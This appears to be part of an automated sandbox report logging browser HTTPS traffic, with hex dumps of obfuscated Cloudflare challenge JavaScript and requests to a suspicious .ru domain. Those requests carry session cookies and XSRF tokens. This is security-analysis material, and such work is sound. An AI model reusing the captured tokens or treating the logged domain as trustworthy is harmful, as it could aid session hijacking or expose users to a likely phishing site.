                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 32 34 29 5d 2c 65 5b 68 61 28 31 30 39 32 29 5d 26 26 67 5b 68 61 28 39 37 31 29 5d 28 74 79 70 65 6f 66 20 65 5b 68 61 28 31 30 39 32 29 5d 2c 68 61 28 35 30 30 29 29 29 26 26 28 6c 3d 65 5b 68 61 28 31 30 39 32 29 5d 5b 68 61 28 35 34 36 29 5d 28 27 5c 6e 27 29 2c 6c 5b 68 61 28 31 33 35 36 29 5d 3e 31 29 26 26 28 6d 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6e 3d 6c 5b 31 5d 5b 68 61 28 31 31 31 37 29 5d 28 6d 29 2c 6e 26 26 28 69 3d 6e 5b 31 5d 2c 6a 3d 70 61 72 73 65 49 6e 74 28 6e 5b 32 5d 2c 31 30 29 2c 6b 3d 70 61 72 73 65 49 6e 74 28 6e 5b 33 5d 2c 31 30 29 29 29 3a 68 3d 4a 53 4f 4e 5b 68 61 28 32 30 31 31 29 5d 28 65 29 3b 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 68 61 28 31 33 36 31 29 5d 3d 68 2c
                                                                                                            Data Ascii: 24)],e[ha(1092)]&&g[ha(971)](typeof e[ha(1092)],ha(500)))&&(l=e[ha(1092)][ha(546)]('\n'),l[ha(1356)]>1)&&(m=/^\s*at\s+(.+):(\d+):(\d+)/,n=l[1][ha(1117)](m),n&&(i=n[1],j=parseInt(n[2],10),k=parseInt(n[3],10))):h=JSON[ha(2011)](e);return o={},o[ha(1361)]=h,
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 4c 55 64 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 68 6b 29 7b 72 65 74 75 72 6e 20 68 6b 3d 62 2c 69 5b 68 6b 28 31 36 31 30 29 5d 28 6f 2c 73 29 7d 2c 27 42 6e 4f 66 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 68 6c 29 7b 72 65 74 75 72 6e 20 68 6c 3d 62 2c 69 5b 68 6c 28 31 35 39 36 29 5d 28 6f 2c 73 29 7d 2c 27 63 73 6d 45 68 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 68 6d 29 7b 72 65 74 75 72 6e 20 68 6d 3d 62 2c 69 5b 68 6d 28 31 36 31 30 29 5d 28 6f 2c 73 29 7d 2c 27 6a 72 48 78 46 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 68 6e 29 7b 72 65 74 75 72 6e 20 68 6e 3d 62 2c 69 5b 68 6e 28 37 38 35 29 5d 28 6f 2c 73 29 7d 2c 27 49 62 66 51 52 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 72 65 74 75 72 6e 20 73 5e 6f 7d 2c 27 72 70 54
                                                                                                            Data Ascii: LUdn':function(o,s,hk){return hk=b,i[hk(1610)](o,s)},'BnOfp':function(o,s,hl){return hl=b,i[hl(1596)](o,s)},'csmEh':function(o,s,hm){return hm=b,i[hm(1610)](o,s)},'jrHxF':function(o,s,hn){return hn=b,i[hn(785)](o,s)},'IbfQR':function(o,s){return s^o},'rpT
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 75 72 6e 21 5b 5d 7d 2c 65 54 3d 30 2c 65 57 3d 7b 7d 2c 65 57 5b 67 4a 28 38 36 37 29 5d 3d 65 56 2c 65 4d 5b 67 4a 28 37 39 38 29 5d 3d 65 57 2c 65 59 3d 65 4d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 31 38 35 38 29 5d 5b 67 4a 28 31 31 33 32 29 5d 2c 65 5a 3d 65 4d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 31 38 35 38 29 5d 5b 67 4a 28 35 34 34 29 5d 2c 66 30 3d 65 4d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 31 38 35 38 29 5d 5b 67 4a 28 31 33 38 30 29 5d 2c 66 63 3d 21 5b 5d 2c 66 6f 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 37 37 36 29 5d 28 67 4a 28 36 32 34 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 65 2c 64 2c 65 29 7b 69 65 3d 67 4a 2c 64 3d 7b 27 49 65 6d 52 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d
                                                                                                            Data Ascii: urn![]},eT=0,eW={},eW[gJ(867)]=eV,eM[gJ(798)]=eW,eY=eM[gJ(1243)][gJ(1858)][gJ(1132)],eZ=eM[gJ(1243)][gJ(1858)][gJ(544)],f0=eM[gJ(1243)][gJ(1858)][gJ(1380)],fc=![],fo=undefined,eM[gJ(776)](gJ(624),function(c,ie,d,e){ie=gJ,d={'IemRL':function(f){return f()}
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 36 32 29 5d 3d 66 55 2c 66 56 5b 67 4a 28 31 38 37 38 29 5d 3d 66 6e 2c 66 56 5b 67 4a 28 39 31 30 29 5d 3d 66 6b 2c 66 56 5b 67 4a 28 38 33 36 29 5d 3d 66 67 2c 66 56 5b 67 4a 28 38 33 35 29 5d 3d 66 66 2c 65 4d 5b 67 4a 28 31 39 35 32 29 5d 3d 66 56 2c 66 57 3d 5b 5d 2c 66 58 3d 30 3b 32 35 36 3e 66 58 3b 66 57 5b 66 58 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 38 35 31 29 5d 28 66 58 29 2c 66 58 2b 2b 29 3b 67 48 3d 28 66 59 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 37 38 37 29 29 2c 66 5a 3d 61 74 6f 62 28 67 4a 28 31 32 31 39 29 29 2c 65 4d 5b 67 4a 28 31 33 35 34 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 37 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6a 4e 29 7b 69 66 28 6a 4e 3d 67 4a 2c 65 4d 5b 6a 4e 28 31 33 35 34 29 5d 29 72 65 74 75 72 6e 3b 65 4d
                                                                                                            Data Ascii: 62)]=fU,fV[gJ(1878)]=fn,fV[gJ(910)]=fk,fV[gJ(836)]=fg,fV[gJ(835)]=ff,eM[gJ(1952)]=fV,fW=[],fX=0;256>fX;fW[fX]=String[gJ(1851)](fX),fX++);gH=(fY=(0,eval)(gJ(1787)),fZ=atob(gJ(1219)),eM[gJ(1354)]=![],eM[gJ(1726)]=function(jN){if(jN=gJ,eM[jN(1354)])return;eM
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 44 3d 78 5b 43 5d 2c 45 3d 67 43 28 67 2c 68 2c 44 29 2c 6f 5b 6b 31 28 31 30 34 34 29 5d 28 42 2c 45 29 29 3f 6f 5b 6b 31 28 37 39 31 29 5d 28 6b 31 28 31 38 31 32 29 2c 6b 31 28 31 34 38 33 29 29 3f 73 5e 3d 67 5b 6b 31 28 31 33 39 34 29 5d 28 68 29 3a 28 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 6b 31 28 31 35 36 39 29 5d 28 68 5b 44 5d 29 2c 6f 5b 6b 31 28 36 33 36 29 5d 28 6f 5b 6b 31 28 31 30 33 36 29 5d 2c 69 2b 44 29 3f 6f 5b 6b 31 28 31 34 38 39 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 6b 31 28 35 35 33 29 5d 28 69 2c 44 29 2c 45 29 3a 28 42 5b 6b 31 28 31 39 35 32 29 5d 5b 6b 31 28 39 31 30 29 5d 28 29 2c 45 5b 6b 31 28 31 39 35 32 29 5d 5b 6b 31 28 38 31 30 29 5d 28 29 2c 43 5b 6b 31 28 39
                                                                                                            Data Ascii: D=x[C],E=gC(g,h,D),o[k1(1044)](B,E))?o[k1(791)](k1(1812),k1(1483))?s^=g[k1(1394)](h):(F='s'===E&&!g[k1(1569)](h[D]),o[k1(636)](o[k1(1036)],i+D)?o[k1(1489)](s,i+D,E):F||s(i+D,h[D])):s(o[k1(553)](i,D),E):(B[k1(1952)][k1(910)](),E[k1(1952)][k1(810)](),C[k1(9


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.449759104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:47 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: image
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:47 UTC240INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:47 GMT
                                                                                                            Content-Type: image/png
                                                                                                            Content-Length: 61
                                                                                                            Connection: close
                                                                                                            cache-control: max-age=2629800, public
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0e75a50c33d-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:47 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.449747104.21.24.1124435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:47 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                                                                            Host: tf6.jqugbctcds.ru
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: image
                                                                                                            Referer: https://tf6.jqugbctcds.ru/0ph1/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Cookie: XSRF-TOKEN=eyJpdiI6Ikl3aHpaTmtlTy84RUVMbHNHNy9ITmc9PSIsInZhbHVlIjoiSDVKSHNoWTJ6TGtBNi9QMlVuYnJNVXQyNkVTNmVkUnlKcDR6VmxmS0NPVkE3RE55UzNsYk4wS1NHTHJHTWhRcXlBZ1ZINEJvUTZRYUFmRHdoaHAvWkV2MWRCUGNXS2taMFVMT2tqeHhQT0RwUlpmMXFQSTRqcDBFQmNia2VmT3UiLCJtYWMiOiI4MTljN2ViYWE3Yzc3YWFmNGRmMDA4NWY5MzFjMjJmNDNkNjJkM2M1ZmNiMmQzNTk1Zjc5NzY3NTZmNDIwMjBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik40U2EycFJReFRIbUFXQ3QrK1doWGc9PSIsInZhbHVlIjoicytjaFlxR1JSQ0l2R0x5dWtqSzdRbHR4TC81a3VSbWlYYVRQckVIUUVtOWlYcW1JQW11dFJkWStNNndtdlNlUmVEam1QNlE1Mlh6bzk2UjE3ekRUeldKTThFYi9OS05ib2JzWmM4KzA3M21wUWZCcGhQM0gxcS8vUDd0TGtCVXoiLCJtYWMiOiJlM2Q5NDVkNTM5ZDRlZDRlMDg0OTljYTkxMTJkNGYwMGEzZjhmZWZmMmM0ZDEzNWI2Yzg0Y2ZiOTc0ZjZmMjIwIiwidGFnIjoiIn0%3D
                                                                                                            2024-12-21 23:46:48 UTC1059INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 21 Dec 2024 23:46:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=14400
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zf2cyPTcb770mHpOo8Ao4kqOpBNflpSWY8j173SOCajOnQ9psL5bIVwcPbiTPo45iui7FJV4U7KQZmJTV%2BSJzfoOMNAg%2ButsQmGrdz26ZLBUppNFse7gc3O68SlnyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Vary: Accept-Encoding
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5570&min_rtt=5537&rtt_var=1623&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2230&delivery_rate=491882&cwnd=238&unsent_bytes=0&cid=19be6584d195fc0c&ts=157&x=0"
                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0ea0b398c89-EWR
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1983&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1896&delivery_rate=1411309&cwnd=202&unsent_bytes=0&cid=159d0a7e7ea639cc&ts=9789&x=0"
                                                                                                            2024-12-21 23:46:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.449763104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:48 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:49 UTC240INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:49 GMT
                                                                                                            Content-Type: image/png
                                                                                                            Content-Length: 61
                                                                                                            Connection: close
                                                                                                            cache-control: max-age=2629800, public
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0f1bd2bc463-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.449764104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:49 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f5bc0d96a8b0caa&lang=auto HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:49 UTC331INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:49 GMT
                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                            Content-Length: 120454
                                                                                                            Connection: close
                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0f23970c3fa-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:49 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73
                                                                                                            Data Ascii: ing%20only.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_overrun_description":"Stuck%20here%3F","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_verifying":"Verifying...","turns
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 2c 66 58 2c 67 33 2c 67 34 2c 67 35 2c 67 66 2c 67 71 2c 67 75 2c 67 42 2c 65 58 2c 65 59 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 38 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 32 30 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 34 32 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 32 31 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 30 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 30 34 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 38 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                                                                                            Data Ascii: ,fX,g3,g4,g5,gf,gq,gu,gB,eX,eY){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1318))/1*(parseInt(gI(520))/2)+-parseInt(gI(642))/3*(parseInt(gI(1621))/4)+parseInt(gI(700))/5*(parseInt(gI(1404))/6)+parseInt(gI(698))/7*(parseInt(gI
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 4f 28 31 34 32 39 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 67 4f 28 34 30 33 29 5d 28 43 2c 78 5b 67 4f 28 31 33 31 30 29 5d 29 3b 44 3d 78 5b 43 5d 2c 45 3d 65 52 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 6f 5b 67 4f 28 31 37 30 32 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 67 4f 28 38 35 38 29 5d 28 68 5b 44 5d 29 2c 6f 5b 67 4f 28 31 36 36 36 29 5d 28 67 4f 28 31 35 32 33 29 2c 6f 5b 67 4f 28 35 38 36 29 5d 28 69 2c 44 29 29 3f 6f 5b 67 4f 28 31 34 39 31 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 67 4f 28 38 39 39 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4e 29 7b 67 4e 3d 62 2c 4f 62 6a 65 63 74 5b 67 4e 28 33 35 30 29
                                                                                                            Data Ascii: O(1429)](B),C=0;o[gO(403)](C,x[gO(1310)]);D=x[C],E=eR(g,h,D),B(E)?(F=o[gO(1702)]('s',E)&&!g[gO(858)](h[D]),o[gO(1666)](gO(1523),o[gO(586)](i,D))?o[gO(1491)](s,i+D,E):F||s(i+D,h[D])):s(o[gO(899)](i,D),E),C++);return j;function s(G,H,gN){gN=b,Object[gN(350)
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 74 75 72 6e 20 68 25 69 7d 2c 27 76 56 41 45 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 76 4f 61 51 74 27 3a 67 53 28 31 34 39 33 29 2c 27 75 65 4b 56 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 71 59 47 4f 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 43 78 54 4f 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 74 74 68 4c 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 58 64 76 78 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 67 66 61 62 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68
                                                                                                            Data Ascii: turn h%i},'vVAEd':function(h,i){return h===i},'vOaQt':gS(1493),'ueKVm':function(h,i){return i==h},'qYGOm':function(h,i){return h<i},'CxTOz':function(h,i){return h<<i},'tthLS':function(h,i){return h==i},'XdvxZ':function(h,i){return h(i)},'gfabf':function(h
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 59 6f 66 69 6b 27 3a 67 55 28 38 32 36 29 7d 2c 67 55 28 31 34 37 36 29 3d 3d 3d 64 5b 67 55 28 34 30 32 29 5d 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 67 56 2c 6b 2c 6c 29 7b 69 66 28 67 56 3d 67 55 2c 6b 3d 7b 7d 2c 6b 5b 67 56 28 31 33 30 36 29 5d 3d 67 56 28 35 37 37 29 2c 6c 3d 6b 2c 69 5b 67 56 28 31 34 37 31 29 5d 28 69 5b 67 56 28 31 30 37 31 29 5d 2c 69 5b 67 56 28 31 30 37 31 29 5d 29 29 72 65 74 75 72 6e 20 67 56 28 37 37 38 29 5b 67 56 28 31 30 32 32 29 5d 28 6a 29 3b 65 6c 73 65 7b 69 66 28 66 28 29 29 72 65 74 75 72 6e 3b 6a 28 6c 5b 67 56 28 31 33 30 36 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 67 57 29 7b 67 57 3d 67 56 2c 6e 5b 67 57 28 33 36 38 29 5d 3d 69 28 67 57
                                                                                                            Data Ascii: Yofik':gU(826)},gU(1476)===d[gU(402)])return null==h?'':f.g(h,6,function(j,gV,k,l){if(gV=gU,k={},k[gV(1306)]=gV(577),l=k,i[gV(1471)](i[gV(1071)],i[gV(1071)]))return gV(778)[gV(1022)](j);else{if(f())return;j(l[gV(1306)],function(n,gW){gW=gV,n[gW(368)]=i(gW
                                                                                                            2024-12-21 23:46:49 UTC1369INData Raw: 7c 31 26 4e 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 5a 28 39 38 31 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 67 5a 28 31 33 31 36 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 67 5a 28 39 36 34 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 50 3d 7b 7d 2c 50 5b 67 5a 28 31 30 33 37 29 5d 3d 64 5b 67 5a 28 37 37 39 29 5d 2c 50 5b 67 5a 28 38 30 32 29 5d 3d 6a 5b 67 5a 28 31 32 30 31 29 5d 5b 67 5a 28 31 34 31 37 29 5d 2c 50 5b 67 5a 28 35 30 32 29 5d 3d 4b 5b 67 5a 28 31 32 30 31 29 5d 5b 67 5a 28 37 36 34 29 5d 2c 50 5b 67 5a 28 31 35 38 31 29 5d 3d 64 5b 67 5a 28 34 33 33 29 5d 2c 50 5b 67 5a 28 38 34 30 29 5d 3d 6f 5b 67 5a 28 31 32
                                                                                                            Data Ascii: |1&N,J==j-1?(J=0,H[gZ(981)](o(I)),I=0):J++,N>>=1,x++);}E--,d[gZ(1316)](0,E)&&(E=Math[gZ(964)](2,G),G++),delete C[D]}else P={},P[gZ(1037)]=d[gZ(779)],P[gZ(802)]=j[gZ(1201)][gZ(1417)],P[gZ(502)]=K[gZ(1201)][gZ(764)],P[gZ(1581)]=d[gZ(433)],P[gZ(840)]=o[gZ(12
